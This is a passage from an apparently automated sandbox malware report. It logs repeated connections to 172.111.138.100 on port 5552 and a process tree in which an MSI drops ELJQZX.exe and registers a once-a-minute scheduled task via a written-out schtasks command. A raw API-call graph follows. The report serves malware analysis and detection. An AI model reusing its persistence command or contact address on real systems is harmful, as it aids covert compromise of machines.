                                      Dec 30, 2024 11:36:58.022483110 CET  5552         49949      172.111.138.100  192.168.2.6
                                      Dec 30, 2024 11:36:58.022538900 CET  49949        5552       192.168.2.6      172.111.138.100
                                      Dec 30, 2024 11:36:58.058701992 CET  49949        5552       192.168.2.6      172.111.138.100
                                      Dec 30, 2024 11:36:58.063591957 CET  5552         49949      172.111.138.100  192.168.2.6
                                      Dec 30, 2024 11:37:04.951342106 CET  49986        5552       192.168.2.6      172.111.138.100
                                      Dec 30, 2024 11:37:04.956264019 CET  5552         49986      172.111.138.100  192.168.2.6
                                      Dec 30, 2024 11:37:04.956384897 CET  49986        5552       192.168.2.6      172.111.138.100
                                      Dec 30, 2024 11:37:04.956729889 CET  49986        5552       192.168.2.6      172.111.138.100
                                      Dec 30, 2024 11:37:04.961554050 CET  5552         49986      172.111.138.100  192.168.2.6
                                      Dec 30, 2024 11:37:07.078279972 CET  5552         49986      172.111.138.100  192.168.2.6
                                      Dec 30, 2024 11:37:07.078365088 CET  49986        5552       192.168.2.6      172.111.138.100
                                      Dec 30, 2024 11:37:07.128298998 CET  49986        5552       192.168.2.6      172.111.138.100
                                      Dec 30, 2024 11:37:07.133142948 CET  5552         49986      172.111.138.100  192.168.2.6
                                      Dec 30, 2024 11:37:14.029357910 CET  49988        5552       192.168.2.6      172.111.138.100
                                      Dec 30, 2024 11:37:14.034205914 CET  5552         49988      172.111.138.100  192.168.2.6
                                      Dec 30, 2024 11:37:14.034317970 CET  49988        5552       192.168.2.6      172.111.138.100
                                      Dec 30, 2024 11:37:14.034641981 CET  49988        5552       192.168.2.6      172.111.138.100
                                      Dec 30, 2024 11:37:14.039387941 CET  5552         49988      172.111.138.100  192.168.2.6
                                      Dec 30, 2024 11:37:25.586901903 CET  5552         49988      172.111.138.100  192.168.2.6
                                      Dec 30, 2024 11:37:25.638124943 CET  49988        5552       192.168.2.6      172.111.138.100
                                      Dec 30, 2024 11:38:03.633678913 CET  5552         49988      172.111.138.100  192.168.2.6
                                      Dec 30, 2024 11:38:03.684983969 CET  49988        5552       192.168.2.6      172.111.138.100


                                      Target ID:0
                                      Start time:05:36:15
                                      Start date:30/12/2024
                                      Path:C:\Windows\System32\msiexec.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\test.msi"
                                      Imagebase:0x7ff695ed0000
                                      File size:69'632 bytes
                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:2
                                      Start time:05:36:15
                                      Start date:30/12/2024
                                      Path:C:\Windows\System32\msiexec.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\msiexec.exe /V
                                      Imagebase:0x7ff695ed0000
                                      File size:69'632 bytes
                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:3
                                      Start time:05:36:16
                                      Start date:30/12/2024
                                      Path:C:\Windows\Installer\MSI77F6.tmp
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\Installer\MSI77F6.tmp"
                                      Imagebase:0x770000
                                      File size:947'712 bytes
                                      MD5 hash:13AF887E6C39E427715E769CC334C83E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000003.00000002.3418899166.0000000004D99000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 88%, ReversingLabs
                                      • Detection: 52%, Virustotal
                                      Reputation:low
                                      Has exited:false

                                      Target ID:4
                                      Start time:05:36:18
                                      Start date:30/12/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1
                                      Imagebase:0x1c0000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:05:36:18
                                      Start date:30/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff66e660000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:6
                                      Start time:05:36:18
                                      Start date:30/12/2024
                                      Path:C:\Windows\SysWOW64\wscript.exe
                                      Wow64 process (32bit):true
                                      Commandline:WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs
                                      Imagebase:0xd60000
                                      File size:147'456 bytes
                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000006.00000002.3415165237.0000000003288000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000006.00000002.3414950251.00000000031D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000006.00000002.3415165237.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:false

                                      Target ID:7
                                      Start time:05:36:18
                                      Start date:30/12/2024
                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                      Wow64 process (32bit):true
                                      Commandline:schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1
                                      Imagebase:0xa40000
                                      File size:187'904 bytes
                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:8
                                      Start time:05:36:20
                                      Start date:30/12/2024
                                      Path:C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe
                                      Imagebase:0x280000
                                      File size:947'712 bytes
                                      MD5 hash:13AF887E6C39E427715E769CC334C83E
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 88%, ReversingLabs
                                      • Detection: 52%, Virustotal
                                      Reputation:low
                                      Has exited:true

                                      Target ID:9
                                      Start time:05:36:27
                                      Start date:30/12/2024
                                      Path:C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe"
                                      Imagebase:0x280000
                                      File size:947'712 bytes
                                      MD5 hash:13AF887E6C39E427715E769CC334C83E
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:13
                                      Start time:05:36:36
                                      Start date:30/12/2024
                                      Path:C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe"
                                      Imagebase:0x280000
                                      File size:947'712 bytes
                                      MD5 hash:13AF887E6C39E427715E769CC334C83E
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:14
                                      Start time:05:36:44
                                      Start date:30/12/2024
                                      Path:C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe"
                                      Imagebase:0x280000
                                      File size:947'712 bytes
                                      MD5 hash:13AF887E6C39E427715E769CC334C83E
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:16
                                      Start time:05:37:01
                                      Start date:30/12/2024
                                      Path:C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe
                                      Imagebase:0x280000
                                      File size:947'712 bytes
                                      MD5 hash:13AF887E6C39E427715E769CC334C83E
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:17
                                      Start time:05:38:00
                                      Start date:30/12/2024
                                      Path:C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe
                                      Imagebase:0x280000
                                      File size:947'712 bytes
                                      MD5 hash:13AF887E6C39E427715E769CC334C83E
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true


                                        Execution Graph

                                        Execution Coverage:4.1%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:11.7%
                                        Total number of Nodes:2000
                                        Total number of Limit Nodes:41
108355 7750ec 108154->108355 108359 78f55e 108154->108359 108368 7d352a 108154->108368 108456 7bdce9 108154->108456 108461 7c9500 108154->108461 108470 7c6fc3 108154->108470 108473 7befcd 108154->108473 108507 7c95af WSAStartup 108154->108507 108509 7c1080 108154->108509 108157->108150 108165->107530 108166->107535 108167->107540 108168->107492 108169->107512 108171 7784be 108170->108171 108188 7784ba 108170->108188 108172 7e5592 __i64tow 108171->108172 108173 7784d2 108171->108173 108174 7e5494 108171->108174 108182 7784ea __itow Mailbox _wcscpy 108171->108182 109071 79234b 80 API calls 3 library calls 108173->109071 108175 7e549d 108174->108175 108176 7e557a 108174->108176 108181 7e54bc 108175->108181 108175->108182 109072 79234b 80 API calls 3 library calls 108176->109072 108178 79010a 48 API calls 108180 7784f4 108178->108180 108183 77caee 48 API calls 108180->108183 108180->108188 108184 79010a 48 API calls 108181->108184 108182->108178 108183->108188 108185 7e54d9 108184->108185 108186 79010a 48 API calls 108185->108186 108187 7e54ff 108186->108187 108187->108188 108189 77caee 48 API calls 108187->108189 108188->107528 108189->108188 108190->107518 108227 79010a 108191->108227 108193 77d3f3 108194 79010a 48 API calls 108193->108194 108195 77d401 108194->108195 108195->108093 108197 7ccd46 108196->108197 108198 7ccd21 108196->108198 108197->108105 108199 77ca8e 48 API calls 108198->108199 108200 7ccd2d 108199->108200 108258 7cc8b7 108200->108258 108203 777ecf 108202->108203 108206 777e5f __NMSG_WRITE 108202->108206 108326 77a2fb 108203->108326 108205 777e85 _memmove 108205->108099 108207 777ec7 108206->108207 108208 777e7b 108206->108208 108325 777eda 48 API calls 108207->108325 108322 77a6f8 108208->108322 108211->108102 108212->108109 108214 77cad0 108213->108214 108215 77ca9a 108213->108215 108216 77cae3 108214->108216 108217 77cad9 108214->108217 108220 79010a 48 API calls 108215->108220 108334 77c4cd 108216->108334 108218 777e53 48 API calls 
108217->108218 108224 77cac6 108218->108224 108221 77caad 108220->108221 108222 7e4f11 108221->108222 108223 77cab8 108221->108223 108222->108224 108225 77d3d2 48 API calls 108222->108225 108223->108224 108226 77caee 48 API calls 108223->108226 108224->108109 108225->108224 108226->108224 108230 790112 __calloc_impl 108227->108230 108229 79012c 108229->108193 108230->108229 108231 79012e std::exception::exception 108230->108231 108236 7945ec 108230->108236 108250 797495 RaiseException 108231->108250 108233 790158 108251 7973cb 47 API calls _free 108233->108251 108235 79016a 108235->108193 108237 794667 __calloc_impl 108236->108237 108243 7945f8 __calloc_impl 108236->108243 108257 79889e 47 API calls __getptd_noexit 108237->108257 108240 79462b RtlAllocateHeap 108240->108243 108249 79465f 108240->108249 108242 794653 108255 79889e 47 API calls __getptd_noexit 108242->108255 108243->108240 108243->108242 108244 794603 108243->108244 108247 794651 108243->108247 108244->108243 108252 798e52 47 API calls __NMSG_WRITE 108244->108252 108253 798eb2 47 API calls 5 library calls 108244->108253 108254 791d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 108244->108254 108256 79889e 47 API calls __getptd_noexit 108247->108256 108249->108230 108250->108233 108251->108235 108252->108244 108253->108244 108255->108247 108256->108249 108257->108249 108260 7cc914 108258->108260 108261 7cc8f7 108258->108261 108316 7cc235 417 API calls Mailbox 108260->108316 108261->108260 108262 7ccc61 108261->108262 108263 7cc934 108261->108263 108264 7ccc6e 108262->108264 108265 7ccca9 108262->108265 108263->108260 108294 7aabf3 108263->108294 108312 78d6b4 48 API calls 108264->108312 108265->108260 108270 7cccb6 108265->108270 108267 7cc964 108267->108260 108268 7cc973 108267->108268 108280 7cc9a1 108268->108280 108298 7aa8c8 108268->108298 108314 78d6b4 48 API calls 108270->108314 108271 7ccc87 108313 7b97b6 89 API calls 108271->108313 108275 7cccd6 108315 7b503c 91 API 
calls Mailbox 108275->108315 108291 7ccc52 108291->108197 108295 7aac16 108294->108295 108296 7aac04 __NMSG_WRITE 108294->108296 108295->108267 108296->108295 108317 773bcf 108296->108317 108312->108271 108313->108291 108314->108275 108315->108291 108316->108291 108318 773bd9 __NMSG_WRITE 108317->108318 108319 79010a 48 API calls 108318->108319 108323 79010a 48 API calls 108322->108323 108324 77a702 108323->108324 108324->108205 108325->108205 108327 77a309 108326->108327 108329 77a321 _memmove 108326->108329 108327->108329 108330 77b8a7 108327->108330 108329->108205 108331 77b8ba 108330->108331 108333 77b8b7 _memmove 108330->108333 108332 79010a 48 API calls 108331->108332 108332->108333 108333->108329 108335 77c4e7 108334->108335 108337 77c4da 108334->108337 108336 79010a 48 API calls 108335->108336 108336->108337 108337->108224 108338->108124 108339->108116 108341 7e787b 108340->108341 108343 78406c 108340->108343 108515 7bd520 86 API calls 4 library calls 108341->108515 108344 7e788c 108343->108344 108352 7840a6 _memmove 108343->108352 108516 7bd520 86 API calls 4 library calls 108344->108516 108346 784175 108351 784185 108346->108351 108514 7cd21a 82 API calls Mailbox 108346->108514 108348 79010a 48 API calls 108348->108352 108349 7841f1 108349->108153 108350 77fa40 417 API calls 108350->108352 108351->108153 108352->108346 108352->108348 108352->108350 108352->108351 108353 7e78d8 108352->108353 108517 7bd520 86 API calls 4 library calls 108353->108517 108356 7750f6 108355->108356 108357 775105 108355->108357 108356->108150 108357->108356 108358 77510a CloseHandle 108357->108358 108358->108356 108518 77cdb4 108359->108518 108361 78f572 108362 78f57a timeGetTime 108361->108362 108363 7e75d1 Sleep 108361->108363 108364 77cdb4 48 API calls 108362->108364 108365 78f590 108364->108365 108523 77e1f0 108365->108523 108369 77d3d2 48 API calls 108368->108369 108370 7d354a 108369->108370 108371 77d3d2 48 API calls 108370->108371 108372 7d3553 108371->108372 108373 
77d3d2 48 API calls 108372->108373 108374 7d355c 108373->108374 108375 7784a6 81 API calls 108374->108375 108383 7d35e9 Mailbox 108374->108383 108376 7d3580 108375->108376 108789 7d3d7b 108376->108789 108383->108150 108457 7784a6 81 API calls 108456->108457 108458 7bdcfc 108457->108458 108855 7b6d6d 108458->108855 108460 7bdd06 108460->108150 108462 77cdb4 48 API calls 108461->108462 108463 7c9515 108462->108463 108464 7bbe47 50 API calls 108463->108464 108465 7c9522 108464->108465 108466 7c952f send 108465->108466 108467 7c9546 108466->108467 108468 7c9552 WSAGetLastError 108467->108468 108469 7c956a 108467->108469 108468->108469 108469->108150 108471 7784a6 81 API calls 108470->108471 108472 7c6fd6 SetWindowTextW 108471->108472 108472->108150 108474 7784a6 81 API calls 108473->108474 108475 7beff2 108474->108475 108867 7b78ad GetFullPathNameW 108475->108867 108480 7bf04b CoInitialize CoCreateInstance 108482 7bf08e 108480->108482 108483 7bf070 108480->108483 108484 7784a6 81 API calls 108482->108484 108486 7bf07a CoUninitialize 108483->108486 108508 7c95e0 108507->108508 108508->108150 108883 7c22e5 108509->108883 108511 7c1090 108511->108150 108512->108151 108513->108150 108514->108349 108515->108344 108516->108351 108517->108351 108519 77cdc5 108518->108519 108520 77cdca 108518->108520 108519->108520 108585 792241 48 API calls 108519->108585 108520->108361 108522 77ce07 108522->108361 108524 77e216 108523->108524 108584 77e226 Mailbox 108523->108584 108525 77e670 108524->108525 108524->108584 108654 78ecee 417 API calls 108525->108654 108527 77e4fd 108527->108150 108529 77e681 108529->108527 108530 77e68e 108529->108530 108656 78ec33 417 API calls Mailbox 108530->108656 108531 77e26c PeekMessageW 108531->108584 108533 7e5b13 Sleep 108533->108584 108535 77e4e7 108535->108527 108655 77322e 16 API calls 108535->108655 108540 78cf79 49 API calls 108540->108584 108542 77e657 PeekMessageW 108542->108584 108543 79010a 48 API calls 108543->108584 108544 77e517 
timeGetTime 108544->108584 108546 77c935 48 API calls 108546->108584 108547 7e5dfc WaitForSingleObject 108550 7e5e19 GetExitCodeProcess CloseHandle 108547->108550 108547->108584 108548 77e641 TranslateMessage DispatchMessageW 108548->108542 108549 7e6147 Sleep 108576 7e5cce Mailbox 108549->108576 108550->108584 108551 77d3d2 48 API calls 108551->108576 108552 77e6cc timeGetTime 108657 78cf79 49 API calls 108552->108657 108553 7e5feb Sleep 108553->108584 108558 7e61de GetExitCodeProcess 108562 7e620a CloseHandle 108558->108562 108563 7e61f4 WaitForSingleObject 108558->108563 108560 771000 393 API calls 108560->108584 108562->108576 108563->108562 108563->108584 108564 7e5cea Sleep 108564->108584 108566 7e5cd7 Sleep 108566->108564 108567 7d8a48 108 API calls 108567->108576 108568 771dce 107 API calls 108568->108584 108569 7e6266 Sleep 108569->108584 108570 77caee 48 API calls 108570->108576 108575 77fa40 393 API calls 108575->108584 108576->108551 108576->108558 108576->108564 108576->108566 108576->108567 108576->108569 108576->108570 108576->108584 108659 7b56dc 49 API calls Mailbox 108576->108659 108660 78cf79 49 API calls 108576->108660 108661 77d380 108576->108661 108665 771000 417 API calls 108576->108665 108667 7cd12a 50 API calls 108576->108667 108668 7b8355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 108576->108668 108669 78e3a5 timeGetTime 108576->108669 108670 7b6f5b CreateToolhelp32Snapshot Process32FirstW 108576->108670 108578 7844e0 393 API calls 108578->108584 108579 783680 393 API calls 108579->108584 108581 7bd520 86 API calls 108581->108584 108582 77caee 48 API calls 108582->108584 108583 77d380 55 API calls 108583->108584 108584->108531 108584->108533 108584->108535 108584->108540 108584->108542 108584->108543 108584->108544 108584->108546 108584->108547 108584->108548 108584->108549 108584->108552 108584->108553 108584->108560 108584->108564 108584->108568 108584->108575 108584->108576 108584->108578 
108584->108579 108584->108581 108584->108582 108584->108583 108586 77e7e0 108584->108586 108593 77ea00 108584->108593 108643 78f381 108584->108643 108648 78ed1a 108584->108648 108653 77e7b0 417 API calls Mailbox 108584->108653 108658 7d8b20 48 API calls 108584->108658 108666 78e3a5 timeGetTime 108584->108666 108585->108522 108587 77e80f 108586->108587 108588 77e7fd 108586->108588 108708 7bd520 86 API calls 4 library calls 108587->108708 108677 77dcd0 108588->108677 108592 7e98e8 108592->108592 108594 77ea20 108593->108594 108595 77fa40 417 API calls 108594->108595 108596 77ea89 108594->108596 108597 7e9919 108595->108597 108602 77d3d2 48 API calls 108596->108602 108623 77eb18 108596->108623 108627 77ecd7 Mailbox 108596->108627 108597->108596 108720 7bd520 86 API calls 4 library calls 108597->108720 108598 7e99bc 108601 77d3d2 48 API calls 108607 77d380 55 API calls 108607->108627 108609 7e9d70 108611 77342c 48 API calls 108611->108627 108612 7e9e49 108613 77fa40 417 API calls 108613->108627 108614 7e9dc2 108615 7e9ddf 108621 7814a0 48 API calls 108621->108627 108623->108601 108623->108627 108627->108598 108627->108607 108627->108609 108627->108611 108627->108612 108627->108613 108627->108614 108627->108615 108627->108621 108628 77f56f 108627->108628 108629 7bd520 86 API calls 108627->108629 108630 7e9a3c 108627->108630 108642 77ef0c Mailbox 108627->108642 108716 77d805 108627->108716 108724 7ba3ee 48 API calls 108627->108724 108725 7cede9 417 API calls 108627->108725 108730 7aa599 InterlockedDecrement 108627->108730 108731 7cf4df 417 API calls 108627->108731 108628->108642 108629->108627 108642->108584 108645 7eee11 108643->108645 108647 78f390 108643->108647 108644 7eee46 108645->108644 108646 7eee28 TranslateAcceleratorW 108645->108646 108646->108647 108647->108584 108649 78ed2c 108648->108649 108651 78ed34 108648->108651 108649->108584 108650 78ed5e IsDialogMessageW 108650->108649 108650->108651 108651->108649 108651->108650 108652 7eebec GetClassLongW 
108651->108652 108652->108650 108652->108651 108653->108584 108654->108535 108655->108529 108657->108584 108658->108584 108659->108576 108660->108576 108662 77d38b 108661->108662 108663 77d3b4 108662->108663 108738 77d772 55 API calls 108662->108738 108663->108576 108665->108576 108666->108584 108667->108576 108668->108576 108669->108576 108739 7b79c2 108670->108739 108678 77fa40 417 API calls 108677->108678 108691 77dd0f _memmove 108678->108691 108708->108592 108720->108596 108724->108627 108725->108627 108730->108627 108731->108627 108738->108663 108740 7b79e9 108739->108740 108744 7b79d0 108739->108744 108759 79224a 58 API calls __wcstoi64 108740->108759 108742 7b79ef 108744->108740 108744->108742 108758 7922df GetStringTypeW __wtof_l 108744->108758 108758->108744 108759->108742 108790 77c4cd 48 API calls 108789->108790 108791 7d3d89 108790->108791 108792 77c4cd 48 API calls 108791->108792 108793 7d3d91 108792->108793 108856 7b6d8a __NMSG_WRITE 108855->108856 108857 7b6db3 GetFileAttributesW 108856->108857 108858 7b6de3 108857->108858 108859 7b6dc5 GetLastError 108857->108859 108858->108460 108860 7b6dd0 CreateDirectoryW 108859->108860 108861 7b6de7 108859->108861 108860->108858 108860->108861 108861->108858 108862 773bcf 48 API calls 108861->108862 108863 7b6df7 _wcsrchr 108862->108863 108863->108858 108864 7b6d6d 48 API calls 108863->108864 108865 7b6e1b 108864->108865 108865->108858 108866 7b6e28 CreateDirectoryW 108865->108866 108866->108858 108868 777e53 48 API calls 108867->108868 108869 7b78df 108868->108869 108870 78e617 48 API calls 108869->108870 108871 7b78eb 108870->108871 108872 7c267a 108871->108872 108873 7c26a4 __NMSG_WRITE 108872->108873 108874 7bf039 108873->108874 108875 7c2763 108873->108875 108876 7c26d8 108873->108876 108874->108480 108879 7739e8 48 API calls 2 library calls 108874->108879 108875->108874 108882 78dfd2 60 API calls 108875->108882 108876->108874 108881 78dfd2 60 API calls 108876->108881 108879->108480 108881->108876 
108882->108875 108884 7c2306 108883->108884 108885 7c230a 108884->108885 108886 7c2365 108884->108886 108887 79010a 48 API calls 108885->108887 108952 78f0f3 48 API calls 108886->108952 108889 7c2311 108887->108889 108890 7c231f 108889->108890 108939 775080 49 API calls 108889->108939 108892 7784a6 81 API calls 108890->108892 108895 7c2331 108892->108895 108893 7c2379 108894 7c234d 108893->108894 108897 7c243f 108893->108897 108898 7c23bb 108893->108898 108894->108511 108940 774bf9 108895->108940 108899 7bbe47 50 API calls 108897->108899 108902 7784a6 81 API calls 108898->108902 108903 7c2446 108899->108903 108909 7c23c2 108902->108909 108959 7b689f SetFilePointerEx SetFilePointerEx WriteFile 108903->108959 108905 7c23f6 108921 7b67dc 108905->108921 108906 7c2400 108953 777b6e 108906->108953 108909->108905 108909->108906 108915 7c23fe Mailbox 108915->108894 108917 7750ec CloseHandle 108915->108917 108919 7c2490 108917->108919 108960 774592 CloseHandle 108919->108960 108922 7b67ec 108921->108922 108923 7b67f6 108921->108923 108977 7b6917 SetFilePointerEx SetFilePointerEx WriteFile 108922->108977 108925 7b6808 108923->108925 108926 7b67fc 108923->108926 108938 7b67f4 Mailbox 108938->108915 108939->108890 108941 7750ec CloseHandle 108940->108941 108942 774c04 108941->108942 109017 774b88 108942->109017 108952->108893 108954 79010a 48 API calls 108953->108954 108955 777b93 108954->108955 108956 77a6f8 48 API calls 108955->108956 108959->108915 108960->108894 108977->108938 109018 774ba1 CreateFileW 109017->109018 109019 7e4957 109017->109019 109071->108182 109072->108182 109073->107579 109074->107579 109075->107579 109076->107579 109077->107579 109078->107578 109079->107572 109080->107551 109081->107548 109082->107557 109083->107565 109085 7784a6 81 API calls 109084->109085 109086 7cf7db 109085->109086 109108 7cf81d Mailbox 109086->109108 109120 7d0458 109086->109120 109088 7cfa7c 109089 7cfbeb 109088->109089 109094 7cfa86 109088->109094 109166 7d0579 89 API calls 
Mailbox 109089->109166 109092 7cfbf8 109093 7cfc04 109092->109093 109092->109094 109093->109108 109133 7cf5fb 109094->109133 109095 7784a6 81 API calls 109113 7cf875 Mailbox 109095->109113 109100 7cfaba 109147 78f92c 109100->109147 109103 7cfaee 109154 773320 109103->109154 109104 7cfad4 109153 7bd520 86 API calls 4 library calls 109104->109153 109107 7cfadf GetCurrentProcess TerminateProcess 109107->109103 109108->107601 109109 7cfb05 109110 7814a0 48 API calls 109109->109110 109119 7cfb2f 109109->109119 109113->109088 109113->109095 109113->109108 109113->109113 109151 7d28d9 48 API calls _memmove 109113->109151 109152 7cfc96 60 API calls 2 library calls 109113->109152 109121 77b8a7 48 API calls 109120->109121 109122 7d0473 CharLowerBuffW 109121->109122 109123 7c267a 60 API calls 109122->109123 109124 7d0494 109123->109124 109126 77d3d2 48 API calls 109124->109126 109132 7d04cf Mailbox 109124->109132 109127 7d04ac 109126->109127 109128 777f40 48 API calls 109127->109128 109130 7d04c3 109128->109130 109129 7d050b Mailbox 109129->109113 109131 77a2fb 48 API calls 109130->109131 109131->109132 109132->109129 109168 7cfc96 60 API calls 2 library calls 109132->109168 109134 7cf66b 109133->109134 109135 7cf616 109133->109135 109139 7d0719 109134->109139 109136 79010a 48 API calls 109135->109136 109137 7cf638 109136->109137 109137->109134 109138 79010a 48 API calls 109137->109138 109138->109137 109140 7d0944 Mailbox 109139->109140 109146 7d073c _strcat _wcscpy __NMSG_WRITE 109139->109146 109140->109100 109141 77d00b 58 API calls 109141->109146 109142 77cdb4 48 API calls 109142->109146 109143 7784a6 81 API calls 109143->109146 109144 7945ec 47 API calls std::exception::_Copy_str 109144->109146 109146->109140 109146->109141 109146->109142 109146->109143 109146->109144 109169 7b8932 50 API calls __NMSG_WRITE 109146->109169 109148 78f941 109147->109148 109149 78f9d9 select 109148->109149 109150 78f9a7 109148->109150 109149->109150 109150->109103 109150->109104 
109151->109113 109152->109113 109153->109107 109155 773334 109154->109155 109157 773339 Mailbox 109154->109157 109156 77342c 48 API calls 109155->109156 109156->109157 109162 773347 109157->109162 109170 77346e 48 API calls 109157->109170 109159 79010a 48 API calls 109161 7733d8 109159->109161 109160 773422 109160->109109 109163 79010a 48 API calls 109161->109163 109162->109159 109162->109160 109166->109092 109168->109129 109169->109146 109170->109162 109172 7d23eb _memset 109171->109172 109173 7d2428 109172->109173 109174 7d2452 109172->109174 109175 77cdb4 48 API calls 109173->109175 109178 77cdb4 48 API calls 109174->109178 109179 7d2476 109174->109179 109176 7d2433 109175->109176 109176->109179 109181 77cdb4 48 API calls 109176->109181 109177 7d24b0 109183 7784a6 81 API calls 109177->109183 109180 7d2448 109178->109180 109179->109177 109182 77cdb4 48 API calls 109179->109182 109185 77cdb4 48 API calls 109180->109185 109181->109180 109182->109177 109184 7d24d4 109183->109184 109186 773bcf 48 API calls 109184->109186 109185->109179 109187 7d24de 109186->109187 109188 7d24e8 109187->109188 109189 7d25a1 109187->109189 109191 7784a6 81 API calls 109188->109191 109190 7d25d3 GetCurrentDirectoryW 109189->109190 109192 7784a6 81 API calls 109189->109192 109193 79010a 48 API calls 109190->109193 109194 7d24f9 109191->109194 109197 7d25b8 109192->109197 109195 7d25f8 GetCurrentDirectoryW 109193->109195 109196 773bcf 48 API calls 109194->109196 109198 7d2605 109195->109198 109199 7d2503 109196->109199 109200 773bcf 48 API calls 109197->109200 109204 77ca8e 48 API calls 109198->109204 109211 7d263e 109198->109211 109201 7784a6 81 API calls 109199->109201 109202 7d25c2 __NMSG_WRITE 109200->109202 109203 7d2514 109201->109203 109202->109190 109202->109211 109205 773bcf 48 API calls 109203->109205 109206 7d261e 109204->109206 109207 7d251e 109205->109207 109208 77ca8e 48 API calls 109206->109208 109209 7784a6 81 API calls 109207->109209 109212 7d262e 109208->109212 109213 
